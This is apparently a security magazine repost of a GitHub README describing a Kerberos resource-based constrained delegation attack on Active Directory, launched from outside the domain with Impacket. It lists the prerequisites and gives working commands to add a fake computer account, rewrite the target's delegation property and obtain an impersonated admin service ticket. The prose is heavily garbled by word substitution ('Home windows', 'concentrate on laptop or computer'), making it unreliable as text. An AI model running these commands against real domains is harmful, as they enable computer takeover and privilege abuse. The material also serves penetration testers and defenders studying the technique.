Rbcd-Attack – Kerberos Resource-Based Constrained Delegation Attack From Outside Using Impacket
This repo is about a realistic assault against Kerberos Useful resource-Dependent Constrained Delegation in a Home windows Active Directory Area.
The variance from other prevalent implementations is that we are launching the attack from outside the house of the Windows Area, not from a domain joined (normally Home windows) laptop.
The assault is implemented working with only Python3 Impacket (and its dependencies). Analyzed on Arch with up-to-date Impacket (.9.21 as of writing).
The Assault
In summary, without the need of any deep particulars, the assault targets a domain personal computer, accurately company principals related to the focus on area laptop or computer.
What we require below as conditions:
- a area account with compose accessibility to the goal computer system (particularly generate obtain to the
msDS-AllowedToActOnBehalfOfOtherIdentity
property of the concentrate on laptop or computer area object) - authorization to make new laptop or computer accounts (this is generally default, see
MachineAccountQuota
) - LDAP (389/tcp) and SAMR (445/tcp) (or LDAPS (636/tcp)) entry to the DC.
- Kerberos (88/tcp) obtain to the DC
The attack path in pretty large degree:
- Make a pretend personal computer
- Abuse
msDS-AllowedToActOnBehalfOfOtherIdentity
property of the target - Request impersonated Services Tickets (S4U) for the concentrate on personal computer
Advantage:
- Impersonated Company Tickets may allow for significant-level accessibility to products and services on the concentrate on like CIFS, HTTP, and so on, if the impersonated account has privileges. Often takeover of the pc.
Popular toolsets
The typical toolsets for this assault work on a domain-joined Home windows Laptop or computer applying:
- Powermad for introducing new laptop accounts
- Powerview from PowerSploit dev branch for
abusing msDS-AllowedToActOnBehalfOfOtherIdentity
- Rubeus for S4U ticket functions
Impacket implementation
This implementation works by using pure Impacket from outdoors the Domain.
Producing the bogus laptop or computer
Employing addcomputer.py case in point from Impacket let’s generate a phony computer system (called evilcomputer
):
addcomputer.py -computer system-title 'evilcomputer$' -laptop or computer-pass ev1lP@sS -dc-ip 192.168.33.203 ecorp.area/exam:ohW9Lie0
Modifying delegation legal rights
Implemented the script rbcd.py found below in the repo which provides the related safety descriptor of the freshly created EVILCOMPUTER to the msDS-AllowedToActOnBehalfOfOtherIdentity
property of the focus on pc.
./rbcd.py -f EVILCOMPUTER -t Website -dc-ip 192.168.33.203 ecorptest:ohW9Lie0
The script utilizes intensely the Python courses in the ntlmrelayx.py
Impacket case in point. For assist and an case in point phone the script with no selections.
Acquiring the impersonated provider ticket
Now every thing is ready for abusing the Constrained Delegation by an S4U2Self question and get an impersonated Support Ticket for the concentrate on pc. With getST.py
Impacket case in point script:
getST.py -spn cifs/World-wide-web.ecorp.neighborhood -impersonate admin -dc-ip 192.168.33.203 ecorp.local/EVILCOMPUTER$:ev1lP@sS
The higher than command fetches a CIFS Support Ticket on behalf of the targetted area user admin
and suppliers it in the file admin.ccache
.
Just after introducing the file route to the KRB5CCNAME variable the ticket is usable for Kerberos purchasers.
export KRB5CCNAME=`pwd`/admin.ccache
klist
References
For information about abusing Useful resource-Centered Constrained Delegation:
- https://shenaniganslabs.io/2019/01/28/Wagging-the-Pet dog.html
- https://www.harmj0y.net/site/activedirectory/a-scenario-research-in-wagging-the-pet dog-pc-takeover/
- http://www.harmj0y.net/blog/activedirectory/s4u2pwnage/
And a person of the most in depth presentations about Kerberos Assaults:
- Developing Kerberos Attacks with Delegation Primitives slides at Defcon by Elad Shamir and Matt Bush
Additional: https://github.com/tothi/rbcd-attack
The article Rbcd-Assault – Kerberos Resource-Based Constrained Delegation Attack From Outside the house Applying Impacket appeared very first on Hakin9 – IT Stability Magazine.